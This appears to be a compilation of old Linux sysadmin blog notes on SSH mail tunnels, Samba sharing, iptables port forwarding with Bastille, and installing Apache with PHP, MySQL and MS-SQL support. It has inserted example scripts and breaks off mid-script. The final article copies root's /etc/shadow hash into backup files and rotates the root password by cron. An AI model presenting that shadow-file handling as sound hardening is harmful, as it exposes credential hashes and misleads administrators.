xterm -geometry 60x5+60+110 -bg green -fg black -T \
    'local:4321]==[ 25:mail.foo.net]' -e /home/foo/bin/putmail.sh &
$
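
The forward described above, with the listener pinned to the loopback address and a check that the local port is not reachable from other machines. This is an added example, not the author's scripts; the function names are hypothetical and the hosts and ports are the placeholders used in this article. Note that with a forward to mail.foo.net through user@foo.net only the hop to foo.net is encrypted; the hop from foo.net to mail.foo.net is still plain POP3 or SMTP.

```shell
#!/bin/sh
# Added example: build a loopback-only SSH forward and verify the listener.

# Print the ssh command for one forward.
#   $1 local port, $2 mail host, $3 mail port, $4 ssh login (user@host)
# -N runs no remote command, so no "sleep" is needed to hold the tunnel
# open; ExitOnForwardFailure makes ssh exit if the local port is taken
# instead of leaving a session without a forward.
tunnel_cmd() {
  printf 'ssh -f -N -o ExitOnForwardFailure=yes -L 127.0.0.1:%s:%s:%s %s\n' \
    "$1" "$2" "$3" "$4"
}

# Read `ss -ltn` style lines on stdin. Succeeds only if port $1 has a
# listener and every listener on that port is bound to 127.0.0.1 or [::1].
loopback_only() {
  awk -v port="$1" '
    $1 == "LISTEN" {
      # Field 4 is "address:port"; the port is whatever follows the last ":".
      n = split($4, parts, ":")
      if (parts[n] != port) next
      addr = substr($4, 1, length($4) - length(parts[n]) - 1)
      seen = 1
      if (addr != "127.0.0.1" && addr != "[::1]") exposed = 1
    }
    END { if (seen && !exposed) exit 0; exit 1 }
  '
}

# Constructed `ss -ltn` output: tunnel bound to loopback only.
sample_listing_ok() {
cat <<'EOF'
State  Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0      128    127.0.0.1:1234     0.0.0.0:*
LISTEN 0      128    [::1]:1234         [::]:*
LISTEN 0      128    0.0.0.0:22         0.0.0.0:*
EOF
}

# Constructed `ss -ltn` output: tunnel bound to every interface.
sample_listing_exposed() {
cat <<'EOF'
State  Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0      128    0.0.0.0:1234       0.0.0.0:*
EOF
}

tunnel_cmd 1234 mail.foo.net 110 user@foo.net
if sample_listing_ok | loopback_only 1234; then
  echo "port 1234: loopback only"
fi
if ! sample_listing_exposed | loopback_only 1234; then
  echo "port 1234: reachable from other hosts (or not listening)"
fi
```

On a live machine, pipe the real listing in with `ss -ltn | loopback_only 1234`.
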

SAMBA - Windows Linux file Sharing Notes

Simple SAMBA on LINUX Sharing

Some basic notes on using SAMBA on a home network with Linux and Windows machines, like my home network setup.

Running SAMBA on a Linux machine

To start, stop or restart samba,

/etc/init.d/smb start
/etc/init.d/smb stop
/etc/init.d/smb restart

All options for SAMBA go in /etc/samba/smb.conf. This is my smb.conf

Notable changes I made are:

My linux machine is a gateway server with two ethernet interfaces eth0 and eth1. For security reasons I set up SAMBA to run only on the internal interface

interfaces = 192.168.0.1/24 127.0.0.1/24
bind interfaces only = Yes

Also set hosts allow to only allow the internal network and localhost.

hosts allow = 127. 192.168.0.
hosts deny = *

SAMBA authentication

For the file access permissions for the shares to work, you have to set up the SAMBA username/password by running the smbpasswd program on the Linux box.

Then on the Windows machine log in with the username/password created above with smbpasswd. Otherwise the file sharing will not work.

SAMBA Linux to Windows Sharing

Set up the shares in /etc/samba/smb.conf as follows


[musak]
comment = music from linux boxen
path = /var/stuff/media/musak
read only = Yes

On the windows machine access it as \\192.168.0.1\musak where 192.168.0.1 is the IP address of the linux machine.

If you want to share a CD/DVD drive:


[dvd]
comment = dvd drive on linux boxen
writable = No
locking = No
path = /mnt/cdrom2

SAMBA Windows to Linux Sharing

First turn on file sharing. Go to Start->Setting->Control Panel and open "Network", and in the first tab called "Configuration" click on "File and Print Sharing..." and in the Dialog Box that comes up check "I want to be able to give others access to my files".

Now go to the file explorer and right click on the folder you want to share, and from the menu that pops up select "Sharing...". From the "Manual Properties" Dialog Box that comes up select the second tab "Sharing" and select "Shared as", which will enable all the text boxes. Fill in the "Share Name" and "Comments", select "Read Only", "Full" or "Depends on Password", and enter a password. This is the password that will give access to this share. Also note the "Share Name"; let's name it "MYSHARE".

Also find out the hostname of the Windows machine. Go to Start->Setting->Control Panel and open "Network", and in the second tab "Identification" note the "Computer Name". This is the name to use from Linux to access shares on this machine. Let it be "MYWINBOX".

Now go to the Linux machine. Create a mount point for the share.

mkdir /mnt/winstuff

Mount the share named "MYSHARE" on the Windows host named "MYWINBOX".

smbmount //MYWINBOX/MYSHARE /mnt/winstuff

This will prompt you for the password for the share. Enter the password, and after that if you go to /mnt/winstuff you can access all files in the Windows folder.

PORT FORWARDING - with IPTABLES while using BASTILLE firewall

Background on network setup

I have my home network setup as described here. So my linux gateway server is the only one visible to the internet, while all other machines are in an internal subnet with DHCP assigned IP's not visible to the outside internet, but can access the outside net using Iptables based Network Address Translation (NAT).

Why you need portforwarding

So in this setup, if I want to run a public service like httpd not on the gateway server ( where it is visible to the outside ) but on an internal machine ( which is not visible outside ), how do I make it available to the outside internet?

To expose an internal machine's service to the outside as in the above scenario, we need to use port forwarding on the gateway server: assigning a port on the gateway to accept all connections and forward them to the port on the internal machine where the service is listening.

Let xxx.xxx.xxx.xxx be the IP address of the gateway server connected to the cable modem and 192.168.0.2 the IP address of the internal machine. And say we want to run a web server ( httpd ) on 192.168.0.2 on port 80 which should be available to the outside internet. We can forward port 80 on xxx.xxx.xxx.xxx to port 80 of 192.168.0.2.

Source: xxx.xxx.xxx.xxx:80 -- forwarded to -> 192.168.0.2:80

You can choose any port on xxx.xxx.xxx.xxx; it need not match the port we are forwarding to.

Source: xxx.xxx.xxx.xxx:8888 -- forwarded to -> 192.168.0.2:80

Port Forwarding using Iptables

Since I have been using the 2.4 kernel, I use iptables for firewall and NAT. So these are the iptables rules required for port forwarding xxx.xxx.xxx.xxx:8888 to 192.168.0.2:80.

/sbin/iptables -t nat -A PREROUTING -p tcp -i eth0 -d xxx.xxx.xxx.xxx \
  --dport 8888 -j DNAT --to 192.168.0.2:80
/sbin/iptables -A FORWARD -p tcp -i eth0 -d 192.168.0.2 --dport 80 -j ACCEPT

How to add custom rules to Bastille firewall

Since I trust the Bastille firewall script to generate the correct iptables scripts for my server, I wanted to keep those scripts but add these custom port forwarding rules to supplement/extend it.

But the version of Bastille on my machine ( 1.2.0 ) does not support port forwarding, and did not have a way of adding custom scripts to it. Posting the question to the Bastille mailing list generated these prompt responses from Peter Watkins, core developer of Bastille. ( See the complete thread )

Following Peter's advice I upgraded Bastille to the latest version, without any problem. The new version regenerated all the scripts with my old rules intact.

And with the new Bastille in place and working fine, doing all the firewall filtering and NAT, I made the following changes to add a supplemental script, portforward.sh ( get the script ), for my custom port forwarding rules.

Created the directories for the supplemental script ( as explained in the comments in portforward.sh ).


/etc/Bastille/firewall.d/pre-chain-split.d/

Created portforward.sh with working portforwarding rules, following the sample script from Peter.
[ Please note: The ipchains rules in portforward.sh are untested. I have left it there from Peter's sample script for completeness. ]

In portforward.sh all you have to do is specify the portforwarding source and destination IP addresses and ports with the ethernet interface name ( "eth0" if you have only one interface ) and the protocol type ( "tcp" in this case ).


IP_FORWARDS="eth0-xxx.xxx.xxx.xxx-8888-tcp-192.168.0.2-80"

You can also specify multiple port forwardings, like:


IP_FORWARDS="eth0-xxx.xxx.xxx.xxx-8888-tcp-192.168.0.2-80
eth0-xxx.xxx.xxx.xxx-2222-tcp-192.168.0.2-22"

This will be parsed and stored into variables further down the script and used in the following iptables calls to generate the rules. [ NOTE: Each rule is a single command; it is split over two lines here, with a trailing backslash, for readability ]


${IPTABLES} -t nat -A PREROUTING -p $fw_inproto -i $fw_iface \
  -d $fw_inaddr --dport $fw_inport -j DNAT --to $fw_outaddr:$fw_outport

${IPTABLES} -A FORWARD -p $fw_inproto -i $fw_iface \
  -d $fw_outaddr --dport $fw_outport -j ACCEPT

Which will translate to.


/sbin/iptables -t nat -A PREROUTING -p tcp -i eth0 -d xxx.xxx.xxx.xxx \
  --dport 8888 -j DNAT --to 192.168.0.2:80
/sbin/iptables -A FORWARD -p tcp -i eth0 -d 192.168.0.2 \
  --dport 80 -j ACCEPT
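
The expansion from IP_FORWARDS entries to the two rules, as an added example that is not Bastille's portforward.sh: it validates each iface-inaddr-inport-proto-outaddr-outport entry before printing the rules as a dry run. The function names and the sample address 203.0.113.10 (standing in for xxx.xxx.xxx.xxx) are assumptions made for this example.

```shell
#!/bin/sh
# Added example (not Bastille's portforward.sh): expand IP_FORWARDS entries
# of the form iface-inaddr-inport-proto-outaddr-outport into iptables rules.
# Dry run: the rules are printed, nothing is applied.
IPTABLES=/sbin/iptables

# is_port N: succeeds when N is a decimal integer in 1..65535
is_port() {
    case $1 in
        ''|*[!0-9]*) return 1 ;;
    esac
    [ "${#1}" -le 5 ] && [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# is_ipv4 ADDR: succeeds for a dotted quad with every octet in 0..255
is_ipv4() {
    case $1 in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    old_ifs=$IFS; IFS=.
    set -- $1
    IFS=$old_ifs
    [ $# -eq 4 ] || return 1
    for octet in "$@"; do
        [ "${#octet}" -le 3 ] && [ "$octet" -le 255 ] || return 1
    done
}

# expand_forward ENTRY: prints the DNAT and FORWARD rule for one entry,
# or says on stderr why the entry was rejected and returns 1
expand_forward() {
    fw_entry=$1
    case $fw_entry in
        ''|*[!A-Za-z0-9._:-]*)
            echo "rejected (unexpected characters): $fw_entry" >&2; return 1 ;;
    esac
    old_ifs=$IFS; IFS=-
    set -- $fw_entry
    IFS=$old_ifs
    if [ $# -ne 6 ]; then
        echo "rejected (need 6 dash-separated fields): $fw_entry" >&2; return 1
    fi
    fw_iface=$1 fw_inaddr=$2 fw_inport=$3
    fw_inproto=$4 fw_outaddr=$5 fw_outport=$6
    case $fw_inproto in
        tcp|udp) ;;
        *) echo "rejected (protocol): $fw_entry" >&2; return 1 ;;
    esac
    if ! is_ipv4 "$fw_inaddr" || ! is_ipv4 "$fw_outaddr"; then
        echo "rejected (address): $fw_entry" >&2; return 1
    fi
    if ! is_port "$fw_inport" || ! is_port "$fw_outport"; then
        echo "rejected (port): $fw_entry" >&2; return 1
    fi
    [ -n "$fw_iface" ] || { echo "rejected (interface): $fw_entry" >&2; return 1; }
    printf '%s -t nat -A PREROUTING -p %s -i %s -d %s --dport %s -j DNAT --to %s:%s\n' \
        "$IPTABLES" "$fw_inproto" "$fw_iface" "$fw_inaddr" "$fw_inport" \
        "$fw_outaddr" "$fw_outport"
    printf '%s -A FORWARD -p %s -i %s -d %s --dport %s -j ACCEPT\n' \
        "$IPTABLES" "$fw_inproto" "$fw_iface" "$fw_outaddr" "$fw_outport"
}

# expand_all LIST: expands every whitespace-separated entry; returns 1 if
# any entry was rejected, so a caller can refuse to load a partial rule set
expand_all() {
    rc=0
    set -f                  # no filename expansion while word-splitting
    for fw_item in $1; do
        expand_forward "$fw_item" || rc=1
    done
    set +f
    return $rc
}

# Constructed sample: 203.0.113.10 (documentation range) stands in for the
# gateway's public address, written xxx.xxx.xxx.xxx in the text above.
SAMPLE_FORWARDS="eth0-203.0.113.10-8888-tcp-192.168.0.2-80
eth0-203.0.113.10-2222-tcp-192.168.0.2-22"

expand_all "$SAMPLE_FORWARDS"
```

An entry that fails any check produces no rule at all, so a typo in IP_FORWARDS cannot turn into a half-formed iptables command.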

Now we can restart the Bastille scripts to make these rules effective.


# /etc/rc.d/init.d/bastille-firewall start

Verify the rules by listing them.


# iptables -t nat -L
Chain PREROUTING (policy ACCEPT)
target prot opt source destination
DNAT tcp -- anywhere xxx.xxx.xxx.xxxtcp dpt:ddi-tcp-1 to:192.168.0.2:80

Chain POSTROUTING (policy ACCEPT)
target prot opt source destination
MASQUERADE all -- 192.168.0.0/16 anywhere
MASQUERADE all -- 192.168.0.0/16 anywhere
MASQUERADE all -- 192.168.0.0/16 anywhere

Chain OUTPUT (policy ACCEPT)
target prot opt source destination
#
[ where "ddi-tcp-1", I assume corresponds to port 8888 ]

Verify that the port forwarding works by connecting to the port from a machine outside the network.

Notes on this setup

The above rules work fine when you access from outside, but if you try to access the same port xxx.xxx.xxx.xxx:8888 from an internal machine, it will not work. But from the internal network you don't need the forwarding, since you can directly access the machine at 192.168.0.2:80.

http://www.netfilter.org/
http://www.bastille-linux.org/

Monday, March 07, 2005

Installing an Apache web server with PHP, MS-SQL and MySQL support

This article came about because many of my programmer friends wanted to host their web-based applications on the Linux web server that I manage. At the time the server already ran Apache with PHP and MySQL support. The problem came up when I asked them which database their applications used: most of them used MS-SQL. So I went looking for the references I needed, and it turned out there were none in Indonesian (or maybe I just did not know of any, hehehehe). That is why I wrote this tutorial for anyone with the same need. I would very much welcome criticism, suggestions and input on this article so that it eventually becomes a representative tutorial.
Suggestions, corrections, criticism, typos, or just greetings can be sent to the e-mail address above. This tutorial has many shortcomings. Thank you.


I am not one for long speeches, so let's go straight to the installation steps.

1. Requirements
mysql-4.0.17.tar.gz
freetds-stable.tgz
httpd-2.0.47.tar.gz
php-4.2.3.tar.gz
Download these files from the respective software sites. If you do not know where, go surfing at Google University, you are sure to find them :-).
I usually put all the extracted files in /usr/local/src; adjust this to your needs. The source archives themselves I keep in /home/bdul.


2. Installing MySQL (optional, if you want MySQL on your web server)

There is no particular reason I use MySQL 4.0.17; I simply used the source that was already on my PC, and that happened to be the only one there.

Create a user and group for mysql; if they already exist, the commands below are not needed.
root@gateway:/usr/local/srcl# groupadd mysql
root@gateway:/usr/local/srcl# useradd -g mysql mysql

Continue by extracting and installing MySQL with these commands:
root@gateway:/usr/local/srcl# tar zxvf /home/bdul/mysql-4.0.17.tar.gz
root@gateway:/usr/local/srcl# cd mysql-4.0.17
root@gateway:/usr/local/srcl# ./configure --prefix=/usr/local/mysql
root@gateway:/usr/local/srcl# make
root@gateway:/usr/local/srcl# make install

If all of this goes smoothly there will be a directory /usr/local/mysql, as shown below:
root@gateway:/usr/local/src# ls /usr/local/mysql
bin include info lib libexec man mysql-test share sql-bench var

At this point you have successfully installed MySQL. But do not celebrate yet, because there are still steps needed to configure MySQL so that it runs properly.

Go to the /usr/local/mysql directory with the command:
root@gateway:/usr/local/srcl#cd /usr/local/mysql

Run the script that installs the supporting databases:
root@gateway:/usr/local/mysql# scripts/mysql_install_db

Change the owner of the mysql directory and everything under it to root:
root@gateway:/usr/local/mysql# chown -R root /usr/local/mysql

Change the owner of the mysql data directory (var) and everything under it to mysql:
root@gateway:/usr/local/mysql# chown -R mysql /usr/local/mysql/var

Change the group of the mysql directory and everything under it to mysql:
root@gateway:/usr/local/mysql# chgrp -R mysql /usr/local/mysql

Change the owner of the mysql/bin directory and everything under it to root:
root@gateway:/usr/local/mysql# chown -R root /usr/local/mysql/bin

Once all of that is done, the mysql directory structure looks like this:
root@gateway:/usr/local/src# ls /usr/local/mysql -l
total 7
drwxr-xr-x 2 root root 1480 Jun 10 14:35 bin
drwxr-xr-x 3 root mysql 72 Jun 10 14:35 include
drwxr-xr-x 2 root mysql 104 Jun 10 14:35 info
drwxr-xr-x 3 root mysql 72 Jun 10 14:35 lib
drwxr-xr-x 2 root mysql 72 Jun 10 14:35 libexec
drwxr-xr-x 3 root mysql 72 Jun 10 14:35 man
drwxr-xr-x 6 root mysql 232 Jun 10 14:35 mysql-test
drwxr-xr-x 3 root mysql 72 Jun 10 14:35 share
drwxr-xr-x 5 root mysql 888 Jun 10 14:35 sql-bench
drwx------ 4 mysql mysql 288 Jun 16 09:21 var

Now let's run MySQL as a daemon:
root@gateway:/usr/local/mysql# bin/mysqld_safe --user=mysql &

Check whether MySQL is now running on the machine with the command:
root@gateway:/usr/local/mysql# ps aux | grep mysql
root 3231 0.0 0.8 2048 1016 tty1 S 09:21 0:00 /bin/sh bin/mysqld_safe
mysql 3248 0.0 9.9 46092 12428 tty1 S 09:21 0:00 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/var --user=mysql --pid-file=/usr/local/mysql/var/gateway.pid --skip-locking
mysql 3250 0.0 9.9 46092 12428 tty1 S 09:21 0:00 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/var --user=mysql --pid-file=/usr/local/mysql/var/gateway.pid --skip-locking
mysql 3251 0.0 9.9 46092 12428 tty1 S 09:21 0:00 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/var --user=mysql --pid-file=/usr/local/mysql/var/gateway.pid --skip-locking
mysql 3252 0.0 9.9 46092 12428 tty1 S 09:21 0:00 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/var --user=mysql --pid-file=/usr/local/mysql/var/gateway.pid --skip-locking
mysql 3253 0.0 9.9 46092 12428 tty1 S 09:21 0:00 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/var --user=mysql --pid-file=/usr/local/mysql/var/gateway.pid --skip-locking
mysql 3254 0.0 9.9 46092 12428 tty1 S 09:21 0:00 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/var --user=mysql --pid-file=/usr/local/mysql/var/gateway.pid --skip-locking
mysql 3255 0.0 9.9 46092 12428 tty1 S 09:21 0:00 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/var --user=mysql --pid-file=/usr/local/mysql/var/gateway.pid --skip-locking
mysql 3256 0.0 9.9 46092 12428 tty1 S 09:21 0:16 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/var --user=mysql --pid-file=/usr/local/mysql/var/gateway.pid --skip-locking
mysql 3257 0.0 9.9 46092 12428 tty1 S 09:21 0:00 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/var --user=mysql --pid-file=/usr/local/mysql/var/gateway.pid --skip-locking
mysql 3258 0.0 9.9 46092 12428 tty1 S 09:21 0:00 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/var --user=mysql --pid-file=/usr/local/mysql/var/gateway.pid --skip-locking
root 3462 0.0 0.3 1472 492 pts/0 S 15:46 0:00 grep mysql


The configuration stage is finished and the MySQL database server is ready to be accessed :-)
To be safer, first set the MySQL root password with the command:
root@gateway:/usr/local/mysql# bin/mysqladmin -u root password 'terserah'

Now let's log in to the database server:
root@gateway:/usr/local/mysql# bin/mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 6 to server version: 4.0.17

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql>

That is the MySQL installation done. It turned out to be rather long :-)


3. Installing FreeTDS

I use the latest version of FreeTDS at the time of writing (12 June 2004), version 0.62.3, downloaded directly from http://www.freetds.org. FreeTDS provides the interface for connecting to an MS-SQL database. It can also serve as the interface for connecting to Sybase, but we are not covering that here :-) If you want that, look for references elsewhere.

Let's go back to /usr/local/src and start installing FreeTDS.
root@gateway:/usr/local/srcl# tar zxvf /home/bdul/freetds-stable.tgz
root@gateway:/usr/local/srcl# cd freetds-0.62.3
root@gateway:/usr/local/srcl# ./configure --prefix=/usr/local/freetds --with-tdsver=8.0 --enable-msdblib
root@gateway:/usr/local/srcl# make
root@gateway:/usr/local/srcl# make install
root@gateway:/usr/local/srcl# make clean

If all of this goes smoothly there will be a directory /usr/local/freetds, as shown below:
root@gateway:/usr/local/src# ls -l /usr/local/freetds
total 4
drwxr-xr-x 2 root root 144 Jun 9 10:00 bin
drwxr-xr-x 2 root root 144 Jun 9 10:00 etc
drwxr-xr-x 2 root root 488 Jun 9 10:00 include
drwxr-xr-x 2 root root 656 Jun 9 10:00 lib
drwxr-xr-x 3 root root 72 Jun 9 10:00 man
drwxr-xr-x 3 root root 72 Jun 9 10:00 share

Let's test FreeTDS by accessing an MS-SQL database. Before that, change to the freetds directory:
root@gateway:/usr/local/srcl# cd /usr/local/freetds

To test the connection we use 'tsql'. For details on -S and -U, please study them yourself.
root@gateway:/usr/local/freetds# bin/tsql -S 192.168.1.1 -U express
locale is "C"
locale charset is "ANSI_X3.4-1968"
Password:
1>

If you get output like the above, the FreeTDS installation worked.


4. Installing Apache

Apache is used as the web server; there are many web servers available and Apache is one of them. Let's go back to /usr/local/src and start installing Apache.
root@gateway:/usr/local/srcl# tar zxvf /home/bdul/httpd-2.0.47.tar.gz
root@gateway:/usr/local/srcl# cd httpd-2.0.47
root@gateway:/usr/local/srcl# ./configure --enable-so
root@gateway:/usr/local/srcl# make
root@gateway:/usr/local/srcl# make install

If all of this goes smoothly there will be a directory /usr/local/apache2, as shown below:
root@gateway:/usr/local/src# ls -l /usr/local/apache2
total 23
drwxr-xr-x 2 root root 464 Jun 10 16:04 bin
drwxr-xr-x 2 root root 312 Jun 10 16:04 build
drwxr-xr-x 2 root root 96 Jun 10 16:04 cgi-bin
drwxr-xr-x 2 root root 336 Jun 10 16:08 conf
drwxr-xr-x 3 root root 1024 Jun 10 16:04 error
drwxr-xr-x 3 root root 1400 Jun 10 17:20 htdocs
drwxr-xr-x 3 root root 4600 Jun 10 16:04 icons
drwxr-xr-x 2 root root 3568 Jun 10 16:04 include
drwxr-xr-x 2 root root 448 Jun 10 16:04 lib
drwxr-xr-x 2 root root 112 Jun 11 13:34 logs
drwxr-xr-x 4 root root 96 Jun 10 16:04 man
drwxr-xr-x 14 root root 8320 Jun 10 16:04 manual
drwxr-xr-x 2 root root 112 Jun 10 16:08 modules

Let's start the web server with the command:
root@gateway:/usr/local/src# /usr/local/apache2/bin/apachectl start

To check that the Apache service is running properly, run:
root@gateway:/usr/local/apache2# ps aux | grep apache
root 3524 1.0 2.1 5920 2684 ? S 16:55 0:00 /usr/local/apache2/bin/httpd -k start
nobody 3525 1.0 2.1 5936 2696 ? S 16:55 0:00 /usr/local/apache2/bin/httpd -k start
nobody 3526 0.0 2.1 5936 2696 ? S 16:55 0:00 /usr/local/apache2/bin/httpd -k start
nobody 3527 0.0 2.1 5936 2696 ? S 16:55 0:00 /usr/local/apache2/bin/httpd -k start
nobody 3528 0.0 2.1 5936 2696 ? S 16:55 0:00 /usr/local/apache2/bin/httpd -k start
nobody 3529 0.0 2.1 5936 2696 ? S 16:55 0:00 /usr/local/apache2/bin/httpd -k start

If you get output like the above, the Apache installation worked.


5. Installing PHP

The last stage is installing PHP itself. Go back to /usr/local/src and start by extracting and installing:
root@gateway:/usr/local/src# tar zxvf /home/bdul/php-4.2.3.tar.gz
root@gateway:/usr/local/src# cd php-4.2.3
root@gateway:/usr/local/src# ./configure --with-apxs2=/usr/local/apache2/bin/apxs --with-mysql \
--with-sybase=/usr/local/freetds --with-mssql=/usr/local/freetds
root@gateway:/usr/local/src# make
root@gateway:/usr/local/src# make install

Copy php.ini to /usr/local/lib/php.ini:
root@gateway:/usr/local/src# cp php.ini-dist /usr/local/lib/php.ini

Edit httpd.conf in /usr/local/apache2/conf/ and add the following lines:
LoadModule php4_module modules/libphp4.so
AddType application/x-httpd-php .php .phtml
AddType application/x-httpd-php-source .phps

Restart Apache with the following command:
root@gateway:/usr/local/src# /usr/local/apache2/bin/apachectl restart

Create a file test.php in /usr/local/apache2/htdocs with the following contents:
<?php
phpinfo();
?>

Open that file in your browser; if it shows the PHP configuration details, the whole installation succeeded :-)
Do not forget to say 'Alhamdulillah hirobbil alamin'.

6. References
www.apache.org
www.php.net
www.mysql.org
www.freetds.org

Securing the Shadow Password with Bash Scripting + Crontab

1. Preparation

Log in as superuser, then create a directory to hold the shadow password files and a directory for the script files. Where you put them is up to you; what matters is that it is easy to understand. I put the shadow files in /home/backup/etc and the scripts in /home/backup/script.
Then back up /etc/shadow to the directory you created, just in case you forget the root password: you can simply restore it.

[sysadmin@notebook]$ /bin/su root
[root@notebook]# cd /home
[root@notebook]# mkdir -p backup/etc
[root@notebook]# mkdir -p backup/script

[root@notebook]# cp /etc/shadow /home/backup/etc
[root@notebook]# chmod 700 backup
-
Step 1. Here we set a new password for root
-
[root@notebook]# passwd
Changing password for root
Enter the new password (minimum of 5, maximum of 127 characters)
Please use a combination of upper and lower case letters and numbers.
New password:
Re-enter new password:
-
Step 2. Then extract the line containing the word "root" from /etc/shadow
-
[root@notebook]# grep ^root /etc/shadow > /home/backup/etc/shadow0

Repeat step 1 with a different password, and in step 2 do this:
-
[root@notebook]# grep ^root /etc/shadow > /home/backup/etc/shadow1

Keep repeating step 1 and step 2, and do not forget to extract the root entry each time, with a different root password for each one
-
[root@notebook]# grep ^root /etc/shadow > /home/backup/etc/shadow2
[root@notebook]# grep ^root /etc/shadow > /home/backup/etc/shadow3
[root@notebook]# grep ^root /etc/shadow > /home/backup/etc/shadow4
[root@notebook]# grep ^root /etc/shadow > /home/backup/etc/shadow5
-
Change the file permissions, then check that the set of files holding the extracted root shadow entries is complete: there should be 6 files
-
[root@notebook]# chmod 600 /home/backup/etc/*
[root@notebook]# ls -l /home/backup/etc/
-rw------- 1 root root 53 2004-09-12 21:10 shadow0
-rw------- 1 root root 53 2004-09-12 21:11 shadow1
-rw------- 1 root root 53 2004-09-12 21:11 shadow2
-rw------- 1 root root 53 2004-09-12 21:11 shadow3
-rw------- 1 root root 53 2004-09-12 21:11 shadow4
-rw------- 1 root root 53 2004-09-12 21:11 shadow5


2. Creating the Scripts

In this part we create the scripts that replace the password in /etc/shadow with the root shadow entries you backed up earlier.
Go to /home/backup/script, then fill in the script files with your favourite editor.
-
[root@notebook]# cd /home/backup/script/
[root@notebook]# vim ubah0
#!/bin/bash
backupfile="/home/backup/etc/shadow0"
usermod -p"`cut -f2 -d: $backupfile`" root
-
[root@notebook]# vim ubah1
#!/bin/bash
backupfile="/home/backup/etc/shadow1"
usermod -p"`cut -f2 -d: $backupfile`" root
-
Create 6 script files (ubah0, ubah1 through ubah5). Pay attention to the numbering of both the scripts and the shadow files, because that is the sensitive part ^_^
Once all 6 scripts are done, change their permissions:
-
[root@notebook]# chmod 700 /home/backup/script/*
[root@notebook]# ls -l /home/backup/script/
-rwx------ 1 root root 114 2004-09-12 21:18 ubah0
-rwx------ 1 root root 114 2004-09-12 21:17 ubah1
-rwx------ 1 root root 114 2004-09-12 21:18 ubah2
-rwx------ 1 root root 114 2004-09-12 21:18 ubah3
-rwx------ 1 root root 114 2004-09-12 21:18 ubah4
-rwx------ 1 root root 114 2004-09-12 21:18 ubah5

3. Scheduling the Shadow Password Change Scripts in Crontab

In this scenario I schedule the scripts to run once every 5 minutes ^_^
From minute 1 to 29 the scripts ubah0-5 are executed, and from minute 30 to 59 the sequence repeats, starting again from ubah0.

Add these lines to /var/spool/cron/crontabs/root
-
00 * * * * /home/backup/script/./ubah0
05 * * * * /home/backup/script/./ubah1
10 * * * * /home/backup/script/./ubah2
15 * * * * /home/backup/script/./ubah3
20 * * * * /home/backup/script/./ubah4
25 * * * * /home/backup/script/./ubah5
30 * * * * /home/backup/script/./ubah0
35 * * * * /home/backup/script/./ubah1
40 * * * * /home/backup/script/./ubah2
45 * * * * /home/backup/script/./ubah3
50 * * * * /home/backup/script/./ubah4
55 * * * * /home/backup/script/./ubah5
-
Restart your crond
-
[root@notebook]# killall -HUP crond
-
Watch the cron executions in /var/log/cron, and pay close attention to the times ^_^
-
[root@notebook]# tail -f /var/log/cron
Sep 12 23:00:01 iman crond[3550]: USER root pid 3555 cmd /home/backup/script/./ubah0
Sep 12 23:05:01 iman crond[3550]: USER root pid 3555 cmd /home/backup/script/./ubah1
Sep 12 23:10:01 iman crond[3550]: USER root pid 3555 cmd /home/backup/script/./ubah2
Sep 12 23:15:01 iman crond[3550]: USER root pid 3555 cmd /home/backup/script/./ubah3
Sep 12 23:20:01 iman crond[3550]: USER root pid 3555 cmd /home/backup/script/./ubah4
Sep 12 23:25:01 iman crond[3550]: USER root pid 3555 cmd /home/backup/script/./ubah5
Sep 12 23:30:01 iman crond[3550]: USER root pid 3555 cmd /home/backup/script/./ubah0

.
.
etc. ....

Also follow the root password changes
-
[root@notebook]# tail -f /var/log/secure
Sep 12 23:00:01 iman usermod[3519]: change user `root' password
Sep 12 23:05:01 iman usermod[3519]: change user `root' password
Sep 12 23:10:01 iman usermod[3519]: change user `root' password
Sep 12 23:15:01 iman usermod[3519]: change user `root' password
Sep 12 23:20:01 iman usermod[3524]: change user `root' password
Sep 12 23:25:01 iman usermod[3530]: change user `root' password
Sep 12 23:30:02 iman usermod[3533]: change user `root' password
.
.
etc. ....
-
Now your root password is changed automatically every 5 minutes, using 5 different passwords. If you feel this is still not secure enough, add more passwords by adding shadow6 and so on, or simply set the password to change every minute.
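
The rotation above as one script, as an added example that is not the author's ubah0..ubah5: it derives the file number from the cron minute and refuses a backup file whose hash field is empty, a placeholder or malformed, because an empty field gives root an empty password entry and the x placeholder from /etc/passwd matches no password at all. The function names are assumptions made for this example, and the script only prints the usermod command.

```shell
#!/bin/sh
# Added example (not the author's ubah0..ubah5): one rotation script that
# derives the slot from the minute and refuses unusable hash fields.
# Dry run: the usermod command is printed, not executed.
# Note: usermod -p puts the hash on the command line, where a process
# listing can show it while the command runs.

# Accepts modular crypt ($id$salt$hash) or a 13-character DES crypt string.
HASH_RE='^(\$[A-Za-z0-9]+\$[A-Za-z0-9./$=,-]+|[./0-9A-Za-z]{13})$'

# slot_for_minute MINUTE COUNT: index of the backup file for that minute,
# e.g. minutes 00 and 30 -> 0, minutes 25 and 55 -> 5 when COUNT is 6
slot_for_minute() {
    m=${1#0}            # "05" -> "5", so the shell does not read it as octal
    m=${m:-0}           # a bare "0" became empty above, restore it
    echo $(( (m / 5) % $2 ))
}

# root_hash FILE: prints field 2 of the root line, fails if it is unusable
root_hash() {
    [ -r "$1" ] || { echo "unreadable: $1" >&2; return 1; }
    h=$(grep '^root:' "$1" | head -n 1 | cut -f2 -d:)
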